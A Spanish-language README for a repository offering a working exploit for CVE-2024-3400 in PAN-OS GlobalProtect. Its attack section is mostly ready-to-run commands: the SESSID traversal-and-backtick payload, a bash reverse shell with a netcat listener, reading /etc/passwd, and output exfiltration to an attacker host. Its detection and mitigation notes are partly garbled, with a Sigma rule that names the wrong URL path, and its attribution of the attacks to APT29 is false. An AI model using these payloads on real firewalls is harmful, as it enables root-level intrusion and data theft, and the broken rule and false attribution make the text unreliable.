
Reproducción de cve-2024-3400-panos_rce_reproduction
CVSS 10.0 CRÍTICO | CWE-78: Inyección de Comandos del SO | Explotado Masivamente en la Naturaleza
CVE-2024-3400 es una vulnerabilidad de inyección de comandos sin autenticación previa en las interfaces del portal y la pasarela (gateway) GlobalProtect de Palo Alto Networks PAN-OS. La vulnerabilidad permite a un atacante no autenticado ejecutar comandos arbitrarios con privilegios de root en el firewall afectado.
La vulnerabilidad reside en el manejo de cookies de sesión del componente del portal y la pasarela GlobalProtect. La función responsable de procesar la cookie SESSID no sanea adecuadamente la entrada proporcionada por el usuario antes de pasarla a un comando de shell.
Específicamente, una solicitud HTTP no autenticada al endpoint del portal GlobalProtect (/global-protect/login.esp) con una cookie SESSID manipulada que contiene metacaracteres de shell incrustados (backticks y expansión de variables) resulta en inyección de comandos.
La ruta de código vulnerable funciona de la siguiente manera:
/global-protect/login.espSESSID se extrae sin saneamientosystem() o una función similar de ejecución de comandos del sistema operativoEl payload de inyección utiliza comandos delimitados por backticks dentro de la cookie SESSID:
SESSID=/../../../opt/panlogs/tmp/device_telemetry/`COMMAND`.py
El path traversal (/../../../) permite salir del directorio previsto, y la porción COMMAND entre backticks hace que el shell ejecute la entrada del atacante. Se pueden utilizar mecanismos de redirección de salida o reverse shell para exfiltrar los resultados de los comandos.
| Versión PAN-OS | Afectadas | Corregida en |
|---|---|---|
| 10.2.x | < 10.2.4-h16, < 10.2.5-h6, < 10.2.6-h3, < 10.2.7-h8, < 10.2.8-h3, < 10.2.9-h1 | 10.2.4-h16 / 10.2.5-h6 / 10.2.6-h3 / 10.2.7-h8 / 10.2.8-h3 / 10.2.9-h1 |
| 11.0.x |
Nota: PAN-OS 9.x y versiones anteriores no están afectadas. Cloud NGFW y Prisma Access no están afectados.
Se observó a UNC4554 / Midnight Blizzard (APT29) explotando CVE-2024-3400 como 0-day a partir de marzo de 2024. Volexity publicó su análisis el 12 de abril de 2024. Los patrones de ataque incluyeron:
Se han publicado múltiples PoCs públicas. Este repositorio proporciona un exploit funcional para pruebas autorizadas.
requestspip install requests
python exploit.py --target https://vulnerable-firewall.example.com --command "id"
# Iniciar listener en la máquina del atacante
nc -lvnp 4444
# Ejecutar reverse shell
python exploit.py --target https://vuln-panos.example.com \
--command "bash -c 'bash -i >& /dev/tcp/192.168.1.100/4444 0>&1'"
python exploit.py --target https://vuln-panos.example.com --command "cat /etc/passwd"
# Prueba básica de ejecución de comandos
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`id\`.py" \
'https://target/global-protect/login.esp'
# Captura de la salida del comando mediante exfiltración por DNS
curl -k --cookie "SESSID=/../../../opt/panlogs/tmp/device_telemetry/\`wget -O- http://attacker/$(id|base64)\`.py" \
'https://target/global-protect/login.esp'
Consulte exploit.py en este repositorio para obtener un exploit Python completo que permite:
/global-protect/login.esp con cookies SESSID anormalmente largas o sospechosas/../../) combinadas con caracteres backtick/opt/panlogs/tmp/device_telemetry/ con extensiones .pytitle: CVE-2024-3400 PAN-OS GlobalProtect Command Injection
status: stable
logsource:
category: webserver
detection:
selection:
cs-uri-query: "/global-protocol/login.esp"
cs-cookie|contains:
- "../"
- "`"
condition: selection
set deviceconfig system telemetry disable yes (bloquea la ruta de código vulnerable sin requerir un reinicio)/opt/panlogs/tmp/device_telemetry/SESSIDAplique el hotfix proporcionado por Palo Alto Networks. La corrección sanea adecuadamente la entrada de la cookie antes de la construcción del comando de shell.
Si sospecha que ha habido explotación:
Este repositorio se proporciona solo para pruebas de seguridad autorizadas y fines educativos. La explotación no autorizada de esta vulnerabilidad es ilegal. Los autores no son responsables del mal uso de esta información. Asegúrese siempre de tener permiso explícito por escrito antes de probar cualquier sistema.
Licencia MIT: este contenido se proporciona para investigación de seguridad defensiva y pruebas autorizadas.
| < 11.0.1-h10, < 11.0.2-h4, < 11.0.3-h10 |
| 11.0.1-h10 / 11.0.2-h4 / 11.0.3-h10 |
| 11.1.x | < 11.1.1-h3 | 11.1.1-h3 |
| Fuente | Enlace |
|---|
| Aviso de seguridad de Palo Alto | https://security.paloaltonetworks.com/CVE-2024-3400 |
| Análisis de Volexity | https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-command-injection-vulnerability-in-palo-alto-networks-pan-os/ |
| Entrada de NVD | https://nvd.nist.gov/vuln/detail/CVE-2024-3400 |
| Detalle de CWE-78 | https://cwe.mitre.org/data/definitions/78.html |
| CISA KEV | https://www.cisa.gov/known-exploited-vulnerabilities-catalog |
| Técnica ATT&CK | https://attack.mitre.org/techniques/T1190/ |